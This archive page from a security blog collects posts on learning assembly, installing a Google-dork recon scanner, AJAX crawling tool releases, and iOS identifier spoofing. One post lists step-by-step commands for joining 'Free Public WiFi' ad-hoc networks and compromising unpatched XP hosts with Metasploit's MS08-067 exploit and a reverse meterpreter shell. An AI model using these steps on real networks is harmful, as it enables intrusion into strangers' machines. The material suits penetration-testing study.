Conquering the ASM Beast

0
Filed under Basics, Fu (a.k.a Tips)

Hey there. You won’t find me claiming to be an expert in reverse engineering or exploit development. This is chiefly due to my limited experience with assembly. Therefore, I will not attempt to write a tutorial or “how to” on any of those topics. However, I have had questions as to where people can go to start learning assembly language. Below are listed some resources I have found the easiest to understand and most benificial. There is actually quite a large amount of assembly related resources out there. However, many of them are too focused on a specific architecture, or come from a development perspective. These resources are almost all exclusively x86 Intel or AT&T resources. If you want to jump into ARM or SPARC assembly you probably need to ask someone else. I will try to list these resources in the order they should be read:

1) Wikipedia: Assembly Language: Wikipedia is always a great place to start. It will give you a brief overview on what assembly is, and some of the terminology invovled. Read this once, twice or three times. Make sure you are familiar with the terminology and concepts.

2) Securitytube’s Assembly Primer for Hackers: These videos are well worth your time. They take assembly, cut out the “development” fluff (stuff that security professionals arn’t usually interested in), and demonstrate its uses in creating exploits.

3) Function Call Conventions: Helps to break down the structure of the stack, how different registers are utilized, and how memory is utilized.

4) 15 First Dates with Assembly: This document gives you step by step demonstrations on how to read assembly and write your own simple programs. This is one of my favorites.

5) Smashing the Stack for Fun and Profit: A classic. Not necessarily an assembly document, but this is a great document to help you think about how you should continue your education on the topic.

This is jsut a start. I hope it helps!

th3 J35t3r’s Foxone: Analysis and Installation on BackTrack 5

1
Filed under Tools, Web Hacking

Hey everyone. So th3j35t3r (the jester) just released one of his recon tools!  He describes it best himself as a “Non- Invasive and Non-Detectable WebServer Reconnaissance Scanner”. He goes on in his normal military tone to explain:

The intel gained serves both as actionable in the sense that it could be directly used to help root a box, while at the same time giving a good overview of stuff that’s present on the box and where it is within the directory structure.

What Does it Do Exactly?

Foxone is a php script that identifies vulnerabilities similarly to other tools like Goolag or SiteDigger. Essentially, foxone uses a mysql database of specific google dorks/queries (see GHDB). When the tool is ran, it fetches the vulnerable urls (from a table called vulnerable_urls) from the database and submits a number of queries. All of the queries are essentially an entry from the vulnerable_url’s table as well as a site: <target> google filter. Each request is submitted in a non-api fashion utilizing the traditional php file_get_contents method. It then scrapes away unnecessary html, parses to determine if the vulnerability is found, and outputs a report upon completion. Included in this report are descriptions of how identified vulnerabilities could be used for further exploitation. One of the nice parts of foxone is that it will update and prioritize vulnerabilities for future scans based upon those that are found more frequently in your own endeavors.

How to install

Installation is a synch. Download it from his blog here. Then from within the foxone directory:

1.Start mySql

# /etc/init.d/mysql start

2. Login to mySql as root/toor

# mysql -u root -p

3. Create the database (he calls it ‘pathfinder’ in the sql script, but it doesn’t matter)

mysql> create database pathfinder

4. Select the database

mysql> use pathfinder

5. run the foxone.sql script

mysql> source foxone.sql

6. Exit mysql, and open foxone(.php) in your favorite text editor. We then need to edit lines 23-26 to look like:

$database_srvr = "localhost";
$database_name = "pathfinder";
$database_user = "root";
$database_pass = "toor";

7. Test it!

# php foxone test

FoxOne Server Reconnaisance Tool v0.5
by th3j35t3r: http://www.twitter.com/th3j35t3r
‘There’s an unequal amount of good and bad in most things,
the trick is to work out the ratio and act accordingly.’

Successfully loaded all 6540 modules.
Anti False-Positive Filter is ENABLED!

The Jester?

For those unfamiliar with who th3j35t3r is, I recommend reading up on him from the following articles. The latter of the two is written by a buddy of mine TJ O’Connor who brings very real insights into the operational future of individuals like th3j35t3r.

Meet a Cyber Special Ops Warrior

The Jester Dynamic: A Lesson in Asymmetric Unmanaged Cyber Warfare

ICSI Netalyzr

0
Filed under Tools

Here is a pretty neat tool. My brother sent it to me. Essentially it runs the gambit of tests from DNS to HTTP and TCP/UDP port access and performance.

Some possible applications include:

  1. basic network testing
  2. identifying firewall rules
  3. identifying IPS filters

Check it out: http://netalyzr.icsi.berkeley.edu/

New Version of OWASP AJAX Crawling Tool

0
Filed under Tools

There is a new release of the AJAX Crawling Tool. I have added a new ‘Output’ tab so you can see the specific url being discovered. I have also enabled output into a flat file as well as standard output.

http://code.google.com/p/fuzzops-ng/

OWASP AJAX Crawling Tool BETA release and how you can help!

0
Filed under News, Tools

Hey everybody! Sorry I have been MIA for so long. Im currently doing some training, and its requiring 13 hour work days.

Anyway, there is an update to ACT that will enable users to utilize it as part of scripting, etc.

How you can help

I have released it as the first beta release for two reasons:

  1. I need more bug reports
  2. I want to know what new features people want
So, please download the new release here: http://code.google.com/p/fuzzops-ng/downloads/list
And when you find a bug, or think of a new feature, log it here: http://code.google.com/p/fuzzops-ng/issues/list

Also…

I am looking for a developer with interest/experience with the ZAP (Zed Attack Proxy) OWASP tool. Simon (the creator) and I have been discussing a plugin module to integrate ACT into ZAP as an installable extension (NOT a combination of the tools). If you are interested, please contact me.

AJAX Crawling Tool added to OWASP

3
Filed under News

Yup, my AJAX Crawling Tool has been accepted as part of OWASP!

Check it out: https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool

Exploiting “Free Public WiFi”

2
Filed under Network Hacking

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

  • Connect to the adhoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
  • Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
  • Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 196.254.1.1 netmask 255.255.0.0
  • Own It
# msconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST 169.254.131.118
# set LHOST 169.254.1.1
# exploit

Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!

Demo: Enumerating AJAX Applications with ACT (AJAX Crawling Tool)

0
Filed under Tools

I created this video in response to multiple and varying requests for information about the tool I just released. This demo shows how ACT can be utilized to more thoroughly enumerate an AJAX application, and then leverage those findings via your favorite attack proxy.

Go check out the demo here: http://vimeo.com/31059474

and download ACT here: http://code.google.com/p/fuzzops-ng/downloads/list

“It’s alive!”… and so am I!

0
Filed under Tools

Hey everybody! Sorry I haven’t posted recently! Lots has been going on here at school and with work. But don’t be dismayed! I have been hard at work! In the past I had posted my Web App and Web Service fuzzier. Well, after reviewing the code, and the level of bugs, I took it back to the drawing board! What I am releasing now is the alpha version of the crawling module of the tool.

Why the rewrite?

Well, the first release (FuzzOps) was very buggy and not very well designed. It did not allow for the type of flexibility that I wanted from the tool.

Why did you modularize the crawler?

After reviewing the purpose of the tool and hearing about some needs in the community, I felt like a portion (the fuzzer) of the project would essentially be “reinventing the wheel”. However, the crawler itself is a unique functionality that lots of security professionals would like to utilize. So rather than tying the AJAX crawling code to the fuzzer, I have made it a module that can be used with any proxy out there. Tying these tools together can then allow security experts to properly crawl their target web applications utilizing their favorite proxy.

 

ACT (AJAX Crawling Tool) is part of the FuzzOps-NG project. You can download it here:

http://code.google.com/p/fuzzops-ng/downloads/list

Make sure to read the README on the wiki page.

 

NOTE: ACT is heavily dependent upon the work done by Seleinum and Crawljax. Please acknowledge them for this tool’s heavy lifting.

Security Implications of Apple’s Transition Away From UDIDs

2
Filed under Research

It was reported that as of iOS 5 Apple will no longer permit developers to utilize the device UDID (Unique Device Identifier). This has numerous functionality issues which will become evident (if they arn’t already). You can read the article here.

UDID

For those unfamiliar with iOS development, it is important to understand how UDIDs are utilized for use in applications. Rather than require the storage of credentials or a generated user ID within the user’s plist (properties) file, many applications rely upon an API call to locally grab the UDID and use that as the primary mode of identification between the server and the client. This removes the need to store passwords or other login credentials in a less safe environment. However, with the proposed changes developers will now need to generate their own unique IDs and store them within the applications plist file.

Application Spoofing/Hijacking

This change, however, may leave the device open to spoofing attacks (both targeted and brute-forced). Because a new application generated identifier will now reside within user accessible storage, the application is forced to trust possibly modified data. Any sort of salting or client-to-server encryption is also evaded because that is done by the application after fetching the stored ID and before the client contacts the server. This clearly stands out from normal network spoofing/hijacking, but can have the same result.

Solution

Admittedly, I havn’t put a ton of thought into a thorough solution. However, my initial assessment seems to indicate that if an application were to encrypt or encode the unique ID before sending it to the client, and again before storing it in the plist file. This would make modification of a stored ID impossible, as well as obfuscate it in transit to prevent sniffing the unencrypted ID. This bypasses the spoofing, as well as prevents a pass-the-hash type attack.

EDIT: Here is the proof-of-concept

iOS App Spoofing through plist Hijacking from Skyler Onken on Vimeo.

css.php